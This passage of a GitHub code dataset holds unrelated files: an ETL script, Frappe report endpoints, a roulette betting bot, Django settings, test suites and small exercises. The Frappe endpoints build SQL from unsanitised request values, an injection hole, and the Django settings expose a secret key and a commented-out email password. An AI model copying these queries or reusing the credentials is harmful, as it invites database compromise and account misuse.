create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n\n ingest_dim_date(source_engine, dw_engine)\n ingest_dim_local(source_engine, dw_engine)\n ingest_dim_product(source_engine, dw_engine)\n ingest_dim_order_payment_and_dim_payment(source_engine, dw_engine)\n ingest_dim_seller(source_engine, dw_engine)\n ingest_dim_customer(source_engine, dw_engine)\n\n\ndef ingest_fact_order_item(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"fact_order_item\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n order_item.order_item_id as original_id,\n orders.order_id as order_id,\n orders.customer_id as customer_original_id,\n orders.order_status as status,\n \n DATE_FORMAT(orders.order_purchase_timestamp, \"%%Y/%%m/%%d\") as purchase_timestamp_str,\n DATE_FORMAT(orders.order_approved_at, \"%%Y/%%m/%%d\") as approved_at_str,\n DATE_FORMAT(orders.order_delivered_carrier_date, \"%%Y/%%m/%%d\") as delivered_carrier_date_str,\n DATE_FORMAT(orders.order_delivered_customer_date, \"%%Y/%%m/%%d\") as delivered_customer_date_str,\n 
DATE_FORMAT(orders.order_estimated_delivery_date, \"%%Y/%%m/%%d\") as estimated_delivery_date_str,\n \n order_item.price as price,\n order_item.product_id as product_original_id,\n order_item.seller_id as seller_original_id\n FROM orders\n INNER JOIN order_item on order_item.order_id = orders.order_id;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n dim_date = pd.read_sql_table(\"dim_date\", con=dw_engine)\n dim_customer = pd.read_sql_table(\"dim_customer\", con=dw_engine)\n dim_product = pd.read_sql_table(\"dim_product\", con=dw_engine)\n dim_seller = pd.read_sql_table(\"dim_seller\", con=dw_engine)\n dim_order_payment = pd.read_sql_table(\"dim_order_payment\", con=dw_engine)\n\n data = pd.merge(data, dim_customer, left_on=['customer_original_id'], right_on=['original_id'])\n data.rename({'id': 'customer_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_product, left_on=['product_original_id'], right_on=['original_id'])\n data.rename({'id': 'product_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_seller, left_on=['seller_original_id'], right_on=['original_id'])\n data.rename({'id': 'seller_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['purchase_timestamp_str'], right_on=['str'])\n data.rename({'id': 'purchase_timestamp_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['approved_at_str'], right_on=['str']) #\n data.rename({'id': 'approved_at_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['delivered_carrier_date_str'], right_on=['str']) #\n data.rename({'id': 'delivered_carrier_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['delivered_customer_date_str'], right_on=['str']) #\n data.rename({'id': 'delivered_customer_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['estimated_delivery_date_str'], right_on=['str'])\n data.rename({'id': 'estimated_delivery_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_order_payment, how='left', on='order_id') #\n data.rename({'id': 'order_payment_id'}, axis=1, inplace=True)\n\n data.rename({'original_id_x': 'original_id'}, axis=1, inplace=True)\n fact_order_item = data[\n ['order_id', 'product_id', 'seller_id', 'customer_id', 'original_id', 'order_payment_id', 'price', 'status',\n 'purchase_timestamp_date_id', 'approved_at_date_id', 'delivered_carrier_date_id', 'delivered_customer_date_id',\n 'estimated_delivery_date_id']].copy()\n fact_order_item.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_facts():\n source_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/sourceDB\", echo=False)\n dw_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n\n ingest_fact_order_item(source_engine, dw_engine)\n\n\ndef delete_all():\n dw_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n dw_connection = dw_engine.connect()\n dw_connection.execute(\"DELETE FROM fact_order_item;\")\n dw_connection.execute(\"DELETE FROM dim_customer;\")\n dw_connection.execute(\"DELETE FROM dim_seller;\")\n dw_connection.execute(\"DELETE FROM dim_payment;\")\n dw_connection.execute(\"DELETE FROM dim_order_payment;\")\n dw_connection.execute(\"DELETE FROM dim_product;\")\n dw_connection.execute(\"DELETE FROM dim_local;\")\n dw_connection.execute(\"DELETE FROM dim_date;\")\n\n\nif __name__ == 
\"__main__\":\n delete_all()\n ingest_dims()\n ingest_facts()\n","repo_name":"CaioSGoncalves/ECommerceDW","sub_path":"1_dw_ingestion.py","file_name":"1_dw_ingestion.py","file_ext":"py","file_size_in_byte":11225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"18618206368","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe import _\nimport frappe.defaults\nimport frappe.permissions\nfrom frappe.core.doctype.user.user import get_system_users\nfrom frappe.utils.csvutils import UnicodeWriter, read_csv_content_from_uploaded_file\nfrom frappe.defaults import clear_default\nimport datetime\n\ndef formated_date(date_str):\n\treturn datetime.datetime.strptime(date_str , '%d-%m-%Y').strftime('%Y-%m-%d')\n\t \n@frappe.whitelist()\ndef get_data(from_date=None,to_date=None,currency=None):\n\tfrappe.errprint(currency)\n\tdata_dict = {'cols':'name ,net_total', 'tab':'`tabSales Order`', 'cond_col': 'delivery_date','cncy':'currency'}\n\tmake_cond(data_dict, from_date, to_date,currency)\t\t\t\t\n\treturn{\n\t\t\"sales_order_total\": make_query(data_dict)\n\t}\n\t\n@frappe.whitelist()\ndef get_jv_data(from_date=None,to_date=None):\n\tdata_dict = {'cols':'name,total_credit', 'tab':'`tabJournal Voucher`', 'cond_col': 'posting_date','cncy':'currency'}\n\tmake_cond(data_dict, from_date, to_date)\t\t\t\t\n\treturn{\n\t\t\"order_total\": make_query(data_dict)\n\t}\n\t\n\ndef make_cond(data_dict, from_date=None,to_date=None,currency=None):\n\t\n\tif from_date and to_date and currency:\n\t\tfrappe.errprint(\"in the else\")\n\t\tdata_dict['cond'] = \"\"\" where %(cond_col)s between '%(from_date)s' and '%(to_date)s' and %(cncy)s = '%(currency)s'\n\t\t\t\"\"\"%{'cond_col': data_dict.get('cond_col'), 'from_date': formated_date(from_date),\n\t\t\t\t\t'to_date': formated_date(to_date),'currency':currency, 'cncy':data_dict.get('cncy')}\n\n\telif from_date and to_date:\n\t\tdata_dict['cond'] = \"\"\" where %(cond_col)s between '%(from_date)s' and '%(to_date)s' \n\t\t\t\"\"\"%{'cond_col': data_dict.get('cond_col'), 'from_date': formated_date(from_date),\n\t\t\t\t\t'to_date': formated_date(to_date)}\n\telse:\n\t\tdata_dict['cond'] = ' '\n\n\ndef make_query(data_dict):\n\tstmt=\"select %(cols)s from %(tab)s %(cond)s\"%data_dict\n\t\n\treturn frappe.db.sql(\"select %(cols)s from %(tab)s %(cond)s\"%data_dict,debug=1)\n\n@frappe.whitelist()\ndef get_activities():\n\tdbname=frappe.db.sql(\"\"\"select site_name from `tabSubAdmin Info` where active=1\"\"\",as_dict=1)\n\tlst=[]\n\tqry_srt='select subject,site_name from('\n\tfor key in dbname:\n\t\ttemp =key['site_name']\n\t\tqry=\"SELECT subject,creation,'%s' as site_name FROM \"%(temp)\n\t\tif temp :\n\t\t\tqry+=temp+'.tabFeed'\n\t\t\tlst.append(qry)\n\tfin_qry=' UNION '.join(lst)\n\tqry=qry_srt+fin_qry+\" where doc_name='Administrator')foo ORDER BY creation DESC limit 5\"\n\tact_details=frappe.db.sql(fin_qry,as_dict=1,debug=1)\n\treturn act_details\n\n\n@frappe.whitelist()\ndef get_data_newsale(from_date=None,to_date=None):\n\tif from_date and to_date:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` where date(creation) between '\"+formated_date(from_date)+\"' and '\"+formated_date(to_date)+\"' order by month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\n\telse:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` order by month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\n\n@frappe.whitelist()\ndef get_prospect(from_date=None,to_date=None):\n\tfrappe.errprint(\"in the pro py\")\n\tfrappe.errprint(from_date)\n\tfrappe.errprint(to_date)\n\n\tif from_date and to_date:\n\t\tstr2=\"select 
name,sum(target_amount*percentage_allocation/100)as target_amount from (SELECT sp.name,bd.fiscal_year,bdd.month,bdd.percentage_allocation,(select sum(td.target_amount) from `tabTarget Detail` td where td.parent=sp.name and td.fiscal_year=bd.fiscal_year) as target_amount,(case when bdd.month in('January','February','March') then SUBSTRING_INDEX(SUBSTRING_INDEX(bd.fiscal_year, '-', 1), ' ', -1) else SUBSTRING_INDEX(SUBSTRING_INDEX(bd.fiscal_year, '-', -1), ' ', -1) end) as year FROM `tabSales Person` sp,`tabBudget Distribution` bd,`tabBudget Distribution Detail` bdd where sp.distribution_id=bd.name and bdd.parent=bd.name )foo where date_format(str_to_date(concat('01-',month,'-',year),'%d-%M-%Y'),'%y-%m') between date_format(date('\"+formated_date(from_date)+\"'),'%y-%m') and date_format(date('\"+formated_date(to_date)+\"'),'%y-%m') group by name\"\n\t\tfrappe.errprint(str2)\n\t\tprospect_details=frappe.db.sql(str2,debug=1)\n\t\tfrappe.errprint(prospect_details)\n\t\treturn{\n\t\t\"order_total\": prospect_details\n\t }\n\telse:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` order by month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\t \n\n\n@frappe.whitelist()\ndef get_subscription(from_date=None,to_date=None):\n\tfrappe.errprint(\"in the get_subscription py\")\n\t#frappe.errprint(from_date)\n\t#frappe.errprint(to_date)\n\t#frappe.errprint(\"calling \")\n\tif from_date and to_date:\n\t\tstr2=\"select name,EXTRACT(month FROM expiry_date) as expiry_date from `tabSite Master` where expiry_date between '\"+formated_date(from_date)+\"' and '\"+formated_date(to_date)+\"'\"\n\t\t#frappe.errprint(str2)\n\t\tsubscription_details=frappe.db.sql(str2,as_list=1)\n\t\tfrappe.errprint(subscription_details)\n\t\treturn{\n\t\t\"order_total\": subscription_details\n\t }\n\telse:\n\t\tstr2=\"select name,EXTRACT(month FROM expiry_date) as expiry_date from `tabSite Master` where expiry_date is not null\"\n\t\t#frappe.errprint(str2)\n\t\tsubscription_details=frappe.db.sql(str2,as_list=1)\n\t\tfrappe.errprint(subscription_details)\n\t\treturn{\n\t\t\"order_total\": subscription_details\n\t }\n\n\t\t \n\n","repo_name":"rohitw1991/smarttailorfrappe","sub_path":"frappe/core/page/graphical_chart/graphical_chart.py","file_name":"graphical_chart.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"13377575425","text":"import time\r\nimport json\r\nfrom datetime import datetime\r\nimport requests\r\n\r\n\r\ndef get_blaze_data(url, save_file=True):\r\n r = requests.get(url)\r\n\r\n if save_file:\r\n save_data_to_file(r.text)\r\n return json.loads(r.text)\r\n\r\n# função que faz a requisição para o horário atual\r\n\r\n\r\ndef make_request(start_date=\"2023-04-23\", end_date=\"2023-04-24\", save_file=True):\r\n cur_hour = get_current_time_hour()\r\n print(cur_hour)\r\n url = f\"https://blaze.com/api/roulette_games/history?startDate={start_date}T{cur_hour}.000Z&endDate={end_date}T{cur_hour}.000Z&page=1\"\r\n\r\n r = requests.get(url)\r\n if save_file:\r\n save_data_to_file(r.text)\r\n return json.loads(r.text)\r\n\r\n\r\ndef save_data_to_file(data):\r\n with open(\"result.json\", \"w\") as f:\r\n f.write(data)\r\n\r\n\r\ndef get_current_time_hour():\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n return current_time\r\n\r\n\r\ndef get_total_pages(data):\r\n return data[\"totalPages\"]\r\n\r\n\r\ndef get_only_result_data(data):\r\n result = []\r\n for i, v in enumerate(data[\"records\"]):\r\n val = v[\"color\"]\r\n if i < 5:\r\n result.append(val)\r\n return result\r\n\r\n\r\ndef estrategia(result_array):\r\n color_count = 0\r\n last = None\r\n print(result_array)\r\n for color in result_array:\r\n if last == None:\r\n last = color\r\n if color == last:\r\n color_count += 1\r\n else:\r\n return color_count\r\n return color_count\r\n\r\n\r\nif __name__ == \"__main__\":\r\n while True:\r\n data = make_request()\r\n result = get_only_result_data(data)\r\n r_est = estrategia(result)\r\n if r_est == 5:\r\n print(\"5 seguidos da mesma cor. Entrada válida!\")\r\n if result[0] == \"red\":\r\n print(\"Aposta: black\")\r\n else:\r\n print(\"Aposta: red\")\r\n elif r_est == 3:\r\n print(\"3 seguidos. Aposta próxima!\")\r\n if result[0] == \"red\":\r\n print(\"Aposta: black\")\r\n else:\r\n print(\"Aposta: red\")\r\n time.sleep(27)\r\n","repo_name":"Eduard0MS/boot","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"9815856627","text":"import csv \r\nfrom Coleccion import Coleccion\r\nfrom EContratado import EContratado\r\n \r\nif __name__=='__main__':\r\n \r\n cant=int(input(\"ingrese la cantidad de empleados a registrar \"))\r\n \r\n ManejaEmpleados=Coleccion(cant)\r\n ManejaEmpleados.cargaEmpleados()\r\n \r\n print(\"1. Registrar Horas\")\r\n print(\"2. Total de Tareas\")\r\n print(\"3. Ayuda Economica\")\r\n print(\"4. Calcular Sueldo\")\r\n \r\n op=int(input(\"ingrese la opcion a realizar: \"))\r\n \r\n while op != 0:\r\n if op == 1:\r\n dni=int(input(\"ingrese dni del empleado \"))\r\n horas=int(input(\"ingrese la cantidad de horas trabajadas: \"))\r\n empleado=ManejaEmpleados.buscaDNI()\r\n if empleado != False and isinstance(empleado,EContratado):\r\n empleado.incrementoHoras(horas) \r\n elif op == 2:\r\n tarea=input(\"ingrese la tarea a buscar: \")\r\n fecha=input(\"ingrese fecha actual: \")\r\n EmpleadoExterno=ManejaEmpleados.buscaTarea(tarea)\r\n confirmacion=ManejaEmpleados.verificaFecha(fecha,EmpleadoExterno)\r\n if EmpleadoExterno != False and confirmacion ==True:\r\n EmpleadoExterno.montoPagar()\r\n elif op == 3:\r\n ManejaEmpleados.ayudaSolidaria()\r\n elif op == 4:\r\n ManejaEmpleados.mostrarSueldo()\r\n else:\r\n print(\"opcion incorrecta. \")\r\n \r\n print(\"1. Registrar Horas\")\r\n print(\"2. Total de Tareas\")\r\n print(\"3. Ayuda Economica\")\r\n print(\"4. Calcular Sueldo\") \r\n \r\n op=int(input(\"ingrese la opcion a realizar: \"))\r\n \r\n \r\n ","repo_name":"Ignacio43/Ejercicio-4.U3","sub_path":"Ejercicio 4.U3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"37577350577","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDjango settings for frikr project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'wd9c_x9m4tz3w$l^m6$+wo+mfr&u*!em&@7)jjy&4e8=)qg^6m'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'photos',\n 'rest_framework'\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'frikr.urls'\n\nWSGI_APPLICATION = 'frikr.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'es-es'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nLOGIN_URL = '/login'\n\n# REST Framework settings\nREST_FRAMEWORK = {\n 'PAGINATE_BY': 3, #indica los elemantos a mostrar por página\n 'PAGINATE_BY_PARAM': 'page_size', # permite definir al cliente el tamaño de paginación\n 'MAX_PAGINATE_BY': 10, # máximo número de items por página permitidos\n 'DEFAULT_RENDERER_CLASSES': (\n 'rest_framework.renderers.JSONRenderer',\n 'rest_framework.renderers.XMLRenderer',\n 'rest_framework.renderers.BrowsableAPIRenderer',\n #'rest_framework.renderers.YAMLRenderer',\n )\n}\n\n\n# Configuración de archivos media\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = '/media/'\n\n\n# Configuración para depurar e-mail\n# python -m smtpd -n -c DebuggingServer localhost:1025\nEMAIL_HOST = '127.0.0.1'\nEMAIL_PORT = 1025\n\n# EMAIL_USE_TLS = True\n# EMAIL_HOST = 'smtp.gmail.com'\n# EMAIL_HOST_USER = 'antonio.jimenez2@gmail.com'\n# EMAIL_HOST_PASSWORD = 'No@violence13cig3cx6h'\n# EMAIL_PORT = 587\n","repo_name":"antjimar/Friker","sub_path":"frikr/frikr/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"10242353439","text":"N,M=map(int,input().split())\nc=[[False]*(N+1) for _ in range(N+1)]\n\nfor i in range(M):\n u,m=map(int,input().split())\n c[u][m]=True\n c[m][u]=True\n \nans=0 \nfor i in range(1,N+1):\n for j in range(i+1,N+1):\n for k in range(j+1,N+1):\n if c[i][j] and c[j][k] and c[k][i]:\n ans+=1\n \nprint(ans)\n","repo_name":"gomatofu/atcoder","sub_path":"submissions/abc262/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"1706579864","text":"\"\"\"\nClass Fitness to treat the fitness as the inverse of the route distance. We want to minimize route distance, so a larger\nfitness score is better.\n\"\"\"\n\n\nclass Fitness:\n def __init__(self, route):\n self.route = route\n self.distance = 0\n self.fitness = 0.0\n\n def route_distance(self):\n if self.distance == 0:\n path_distance = 0\n for i in range(0, len(self.route)):\n from_city = self.route[i]\n if (i + 1) < len(self.route):\n to_city = self.route[i + 1]\n else:\n to_city = self.route[0]\n path_distance += from_city.distance(to_city)\n self.distance = path_distance\n return self.distance\n\n def route_fitness(self):\n if self.fitness == 0:\n self.fitness = 1 / float(self.route_distance())\n return self.fitness\n","repo_name":"NamizataS/Biomimetics_TPs","sub_path":"TP3/Fitness.py","file_name":"Fitness.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72611770671","text":"import contextlib\nimport os\nfrom unittest import mock\n\nimport testtools\n\nfrom troveclient.apiclient import exceptions\nfrom troveclient import base\nfrom troveclient import common\nfrom troveclient import utils\n\n\"\"\"\nUnit tests for base.py\n\"\"\"\n\nUUID = '8e8ec658-c7b0-4243-bdf8-6f7f2952c0d0'\n\n\ndef obj_class(self, res, loaded=True):\n return res\n\n\nclass BaseTest(testtools.TestCase):\n def test_getid(self):\n obj = \"test\"\n r = base.getid(obj)\n self.assertEqual(obj, r)\n\n test_id = \"test_id\"\n obj = mock.Mock()\n obj.id = test_id\n r = base.getid(obj)\n self.assertEqual(test_id, r)\n\n\nclass ManagerTest(testtools.TestCase):\n def setUp(self):\n super(ManagerTest, self).setUp()\n self.orig__init = base.Manager.__init__\n base.Manager.__init__ = mock.Mock(return_value=None)\n self.orig_os_makedirs = os.makedirs\n\n def tearDown(self):\n super(ManagerTest, self).tearDown()\n base.Manager.__init__ = self.orig__init\n os.makedirs = self.orig_os_makedirs\n\n def test___init__(self):\n api = mock.Mock()\n base.Manager.__init__ = self.orig__init\n manager = base.Manager(api)\n self.assertEqual(api, manager.api)\n\n def test_completion_cache(self):\n manager = base.Manager()\n\n # handling exceptions\n mode = \"w\"\n cache_type = \"unittest\"\n obj_class = mock.Mock\n with manager.completion_cache(cache_type, obj_class, mode):\n pass\n\n os.makedirs = mock.Mock(side_effect=OSError)\n with manager.completion_cache(cache_type, obj_class, mode):\n pass\n\n def test_write_to_completion_cache(self):\n manager = base.Manager()\n\n # no cache object, nothing should happen\n manager.write_to_completion_cache(\"non-exist\", \"val\")\n manager._mock_cache = mock.Mock()\n manager._mock_cache.write = mock.Mock(return_value=None)\n manager.write_to_completion_cache(\"mock\", \"val\")\n self.assertEqual(1, manager._mock_cache.write.call_count)\n\n def _get_mock(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n\n def side_effect_func(self, body, loaded=True):\n return body\n\n manager.resource_class = mock.Mock(side_effect=side_effect_func)\n return manager\n\n def test__get_with_response_key_none(self):\n manager = self._get_mock()\n url_ = \"test-url\"\n body_ = \"test-body\"\n resp_ = \"test-resp\"\n manager.api.client.get = mock.Mock(return_value=(resp_, body_))\n r = manager._get(url=url_, response_key=None)\n self.assertEqual(body_, r)\n\n def test__get_with_response_key(self):\n manager = self._get_mock()\n response_key = \"response_key\"\n body_ = {response_key: \"test-resp-key-body\"}\n url_ = \"test_url_get\"\n manager.api.client.get = mock.Mock(return_value=(url_, body_))\n r = manager._get(url=url_, response_key=response_key)\n self.assertEqual(body_[response_key], r)\n\n def test__create(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n\n response_key = \"response_key\"\n data_ = \"test-data\"\n body_ = {response_key: data_}\n url_ = \"test_url_post\"\n manager.api.client.post = mock.Mock(return_value=(url_, body_))\n\n return_raw = True\n r = manager._create(url_, body_, response_key, return_raw)\n self.assertEqual(data_, r)\n\n return_raw = False\n\n @contextlib.contextmanager\n def completion_cache_mock(*arg, **kwargs):\n yield\n\n mockl = mock.Mock()\n mockl.side_effect = completion_cache_mock\n manager.completion_cache = mockl\n\n manager.resource_class = mock.Mock(return_value=\"test-class\")\n r = manager._create(url_, body_, response_key, 
return_raw)\n self.assertEqual(\"test-class\", r)\n\n def get_mock_mng_api_client(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n return manager\n\n def test__delete(self):\n resp_ = \"test-resp\"\n body_ = \"test-body\"\n\n manager = self.get_mock_mng_api_client()\n manager.api.client.delete = mock.Mock(return_value=(resp_, body_))\n # _delete just calls api.client.delete, and does nothing\n # the correctness should be tested in api class\n manager._delete(\"test-url\")\n pass\n\n def test__update(self):\n resp_ = \"test-resp\"\n body_ = \"test-body\"\n\n manager = self.get_mock_mng_api_client()\n manager.api.client.put = mock.Mock(return_value=(resp_, body_))\n body = manager._update(\"test-url\", body_)\n self.assertEqual(body_, body)\n\n\nclass ManagerListTest(ManagerTest):\n def setUp(self):\n super(ManagerListTest, self).setUp()\n\n @contextlib.contextmanager\n def completion_cache_mock(*arg, **kwargs):\n yield\n\n self.manager = base.Manager()\n self.manager.api = mock.Mock()\n self.manager.api.client = mock.Mock()\n\n self.response_key = \"response_key\"\n self.data_p = [\"p1\", \"p2\"]\n self.body_p = {self.response_key: self.data_p}\n self.url_p = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(\n return_value=(self.url_p, self.body_p)\n )\n self.data_g = [\"g1\", \"g2\", \"g3\"]\n self.body_g = {self.response_key: self.data_g}\n self.url_g = \"test_url_get\"\n self.manager.api.client.get = mock.Mock(\n return_value=(self.url_g, self.body_g)\n )\n\n mockl = mock.Mock()\n mockl.side_effect = completion_cache_mock\n self.manager.completion_cache = mockl\n\n def tearDown(self):\n super(ManagerListTest, self).tearDown()\n\n def test_list_with_body_none(self):\n body = None\n li = self.manager._list(\"url\", self.response_key, obj_class, body)\n self.assertEqual(len(self.data_g), len(li))\n for i in range(0, len(li)):\n self.assertEqual(self.data_g[i], li[i])\n\n def test_list_body_not_none(self):\n body = \"something\"\n li = self.manager._list(\"url\", self.response_key, obj_class, body)\n self.assertEqual(len(self.data_p), len(li))\n for i in range(0, len(li)):\n self.assertEqual(self.data_p[i], li[i])\n\n def test_list_key_mapping(self):\n data_ = {\"values\": [\"p1\", \"p2\"]}\n body_ = {self.response_key: data_}\n url_ = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(return_value=(url_, body_))\n li = self.manager._list(\"url\", self.response_key,\n obj_class, \"something\")\n data = data_[\"values\"]\n self.assertEqual(len(data), len(li))\n for i in range(0, len(li)):\n self.assertEqual(data[i], li[i])\n\n def test_list_without_key_mapping(self):\n data_ = {\"v1\": \"1\", \"v2\": \"2\"}\n body_ = {self.response_key: data_}\n url_ = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(return_value=(url_, body_))\n li = self.manager._list(\"url\", self.response_key,\n obj_class, \"something\")\n self.assertEqual(len(data_), len(li))\n\n\nclass MangerPaginationTests(ManagerTest):\n\n def setUp(self):\n super(MangerPaginationTests, self).setUp()\n self.manager = base.Manager()\n self.manager.api = mock.Mock()\n self.manager.api.client = mock.Mock()\n self.manager.resource_class = base.Resource\n\n self.response_key = \"response_key\"\n self.data = [{\"foo\": \"p1\"}, {\"foo\": \"p2\"}]\n self.next_data = [{\"foo\": \"p3\"}, {\"foo\": \"p4\"}]\n self.marker = 'test-marker'\n self.limit = '20'\n self.url = \"http://test_url\"\n self.next_url = '%s?marker=%s&limit=%s' % (self.url, self.marker,\n 
self.limit)\n self.links = [{'href': self.next_url, 'rel': 'next'}]\n self.body = {\n self.response_key: self.data,\n 'links': self.links\n }\n self.next_body = {self.response_key: self.next_data}\n\n def side_effect(url):\n if url == self.url:\n return None, self.body\n # In python 3 the order in the dictionary is not constant\n # between runs. So we cant rely on the URL params to be\n # in the same order\n if ('marker=%s' % self.marker in url and\n 'limit=%s' % self.limit in url):\n self.next_url = url\n return None, self.next_body\n\n self.manager.api.client.get = mock.Mock(side_effect=side_effect)\n\n def tearDown(self):\n super(MangerPaginationTests, self).tearDown()\n\n def test_pagination(self):\n resp = self.manager._paginated(self.url, self.response_key)\n self.manager.api.client.get.assert_called_with(self.url)\n self.assertEqual('p1', resp[0].foo)\n self.assertEqual('p2', resp[1].foo)\n self.assertEqual(self.marker, resp.next)\n self.assertEqual(self.links, resp.links)\n self.assertIsInstance(resp, common.Paginated)\n\n def test_pagination_next(self):\n resp = self.manager._paginated(self.url, self.response_key,\n limit=self.limit, marker=self.marker)\n self.manager.api.client.get.assert_called_with(self.next_url)\n self.assertEqual('p3', resp[0].foo)\n self.assertEqual('p4', resp[1].foo)\n self.assertIsNone(resp.next)\n self.assertEqual([], resp.links)\n self.assertIsInstance(resp, common.Paginated)\n\n def test_pagination_error(self):\n self.manager.api.client.get = mock.Mock(return_value=(None, None))\n self.assertRaises(Exception, self.manager._paginated,\n self.url, self.response_key)\n\n\nclass FakeResource(object):\n def __init__(self, _id, properties):\n self.id = _id\n try:\n self.name = properties['name']\n except KeyError:\n pass\n try:\n self.display_name = properties['display_name']\n except KeyError:\n pass\n\n\nclass FakeManager(base.ManagerWithFind):\n resource_class = FakeResource\n\n resources = [\n FakeResource('1234', {'name': 'entity_one'}),\n FakeResource(UUID, {'name': 'entity_two'}),\n FakeResource('4242', {'display_name': 'entity_three'}),\n FakeResource('5678', {'name': '9876'})\n ]\n\n def get(self, resource_id):\n for resource in self.resources:\n if resource.id == str(resource_id):\n return resource\n raise exceptions.NotFound(resource_id)\n\n def list(self):\n return self.resources\n\n\nclass FindResourceTestCase(testtools.TestCase):\n def setUp(self):\n super(FindResourceTestCase, self).setUp()\n self.manager = FakeManager(None)\n\n def test_find_none(self):\n self.assertRaises(exceptions.CommandError,\n utils.find_resource,\n self.manager,\n 'asdf')\n\n def test_find_by_integer_id(self):\n output = utils.find_resource(self.manager, 1234)\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_str_id(self):\n output = utils.find_resource(self.manager, '1234')\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_uuid(self):\n output = utils.find_resource(self.manager, UUID)\n self.assertEqual(self.manager.get(UUID), output)\n\n def test_find_by_str_name(self):\n output = utils.find_resource(self.manager, 'entity_one')\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_str_displayname(self):\n output = utils.find_resource(self.manager, 'entity_three')\n self.assertEqual(self.manager.get('4242'), 